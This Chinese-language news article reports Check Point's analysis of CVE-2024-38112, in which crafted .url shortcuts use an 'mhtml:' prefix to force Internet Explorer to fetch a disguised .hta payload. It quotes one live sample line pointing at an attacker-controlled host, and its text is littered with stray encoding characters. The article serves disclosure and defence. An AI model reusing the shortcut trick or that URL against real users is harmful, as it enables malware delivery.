誰能想到��,早在 2022 年 6 月 15 日正式退役的 IE 瀏覽器��,近日還能因漏洞被推上風口浪尖?
全球網絡安全解決方案提供商 Check Point Research(簡稱為 CPR)最近發現:有攻擊者在過去 18 個月里�����,通過構建特殊的 Windows Internet 快捷方式文件(即 .url)�,引誘用戶點擊并調用 IE 瀏覽器來訪問攻擊者控制的 URL,以此進行惡意攻擊。
據了解��,這種漏洞甚至可以繞過 Windows 10����、Windows 11 系統的安全防護。
強制調用 IE 瀏覽器打開 URL
據悉,該漏洞由 CPR 研究人員發現�����,追蹤編號為 CVE-2024-38112�����,微軟方面將其描述為 Windows MSHTML 平臺欺騙漏洞,自 2023 年 1 月以來就一直在被黑客利用:“我們發現的惡意 .url 樣本最早可以追溯到 2023 年 1 月(一年多前),最晚可以追溯到 2024 年 5 月 13 日�。這表明�,網絡罪犯使用這種攻擊技術已經有一段時間了��?����!?/span>
通過對攻擊過程的詳細分析,CPR 研究人員將該漏洞的實現分解為兩個步驟:
那么接下來,我們就先了解一下這個能在 Windows 中調用 IE 瀏覽器的“mhtml”技巧��。
一般情況下�����,Internet 快捷方式文件(即 .url)是一個文本文件�����,里面包含各種配置信息,如顯示什么圖標、雙擊時打開什么鏈接等�����。將其保存為 .url 文件并雙擊后���,Windows 會在默認瀏覽器中打開這個 URL�����。
然而,攻擊者發現可以在 URL 指令中使用 mhtml: URI 處理程序���,以此強制用 IE 瀏覽器打開指定的 URL。以下面這個惡意 .url 樣本為例:
可以看到�����,.url 文件的最后幾行字符串指向 Microsoft Edge 應用程序文件中的一個自定義圖標�。乍一看,它似乎指向一個 PDF 文件����,但實際上并非如此��。CPR 研究人員發現這個關鍵字的值與通常的關鍵字有很大不同:普通 .url 文件的參數類似于 URL=https://www.google.com;但這個惡意樣本的值是 URL=mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html�。
它使用了一個特殊的前綴“mhtml:”���。簡單說明一下 MHTML�,這是一種“聚合 HTML 文檔的 MIME 封裝”文件�����,是 IE 瀏覽器中引入的一種存儲文件技術���,可將包括圖像在內的整個網頁封裝成一個單一檔案����。
CPR 研究人員指出���,這樣的惡意 .url 文件在 Windows 11 中會顯示為一個指向 PDF 文件的鏈接:
如果受害者想打開 PDF��,雙擊這個 .url 文件,然后便會彈出下面這個來自 IE 瀏覽器的窗口:
沒錯�,攻擊者使用 mhtml: URI 啟動 URL 后����,Windows 會自動在 IE 瀏覽器中啟動 URL�,而不是默認瀏覽器。如文章開頭所說��,IE 瀏覽器早在 2022 年就退出歷史舞臺了�,在典型的 Windows 10/11 操作系統上,因其安全性不足����,用戶一般無法直接用 IE 去訪問網站���。
不過有一點需要明確:盡管 IE 已被微軟宣布“退役”���,但從技術上講�,IE 仍是 Windows 系統的一部分,IE 使用的專有瀏覽器引擎 MSHTML (Trident)也仍包含在操作系統中����,微軟計劃至少支持該引擎到 2029 年����。
因此��,攻擊者使用“mhtml”技巧���,讓本意想打開 PDF 的用戶�,實際上正在用不安全且過時的 IE 訪問攻擊者控制的網站��,尤其在 IE 下載惡意文件時安全警告也相對較少。
打開一個偽裝成 PDF 的惡意 .hta 文件
既然打開的不是 PDF����,那受害者通過 IE 打開的到底是什么呢�����?
根據 IE 瀏覽器的彈出窗口顯示,它要求用戶打開一個名為 .Books_A0UJKO.pdf 的 PDF 文件:
可一旦點擊了這個“Open”(默認選項),緊接著又會跳出另一個窗口:IE 保護模式下的警告提示��。
到了這一步�����,如果用戶一直以為自己打開的不過是個 PDF�,大概率會忽略這個警告�����,那么打開的就會是一個偽裝成 PDF 的惡意 .hta 文件���。這是一個從 HTML 文檔中調用的可執行程序����,通過一個名為 Microsoft HTML Application Host(mshta.exe)的工具在 Windows 上運行�。
CPR 研究人員解釋道:“如果我們仔細觀察 HTTP 流量,就會發現在字符串末尾有許多不可打印的字符——最后是 .hta 字符串����,這才是真正的(危險的)擴展名���?���!?/span>
但這個 .hta 字符串被隱藏了:用戶看不到真實的擴展名�����,所以無防備地繼續點擊文件,根本不知道自己其實正在下載并啟動一個危險的 .hta 應用程序���。
一定要警惕從不可信來源發送的 .url 文件
據 CPR 研究人員證實,這個漏洞所用的技巧在 Windows 10/11 操作系統上均可實現�。
于是��,CPR 方面在 2024 年 5 月 16 日向微軟安全響應中心(MSRC)報告了該漏洞。此后��,雙方一直就此事密切合作�,終于在 7 月 9 日發布了微軟官方補丁(CVE-2024-38112)�。
從通用漏洞評分系統(CVSS)來看�,CVE-2024-38112 的評分為 7.5(滿分 10 分)�����,屬于重要漏洞�,攻擊者需采取額外行動才能確保成功利用該漏洞��。而不論是微軟還是 CPR�,都強烈建議 Windows 用戶盡快更新該補丁���,因為根據調查顯示該漏洞已被黑客利用一年多了。
最后,CPR 也給出了重要提醒:“對于相關的 Windows 用戶���,我們建議一定要警惕從不可信來源發送的 .url 文件,畢竟這種類型的攻擊需要一些用戶交互(如忽略警告彈窗)才能成功?���!?/span>
參考鏈接:
https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112
大模型刷新一切�,讓我們有著諸多的迷茫�����,AI 這股熱潮究竟會推著我們走向何方?面對時不時一夜變天���,焦慮感油然而生,開發者怎么能夠更快�����、更系統地擁抱大模型���?《新程序員 007》以「大模型時代�����,開發者的成長指南」為核心���,希望撥開層層迷霧����,讓開發者定下心地看到及擁抱未來���。
讀過本書的開發者這樣感慨道:“讓我驚喜的是����,中國還有這種高質量、貼近開發者的雜志���,我感到非常激動。最吸引我的是里面有很多人對 AI 的看法和經驗和一些采訪的內容����,這些內容既真實又有價值?!?/span>
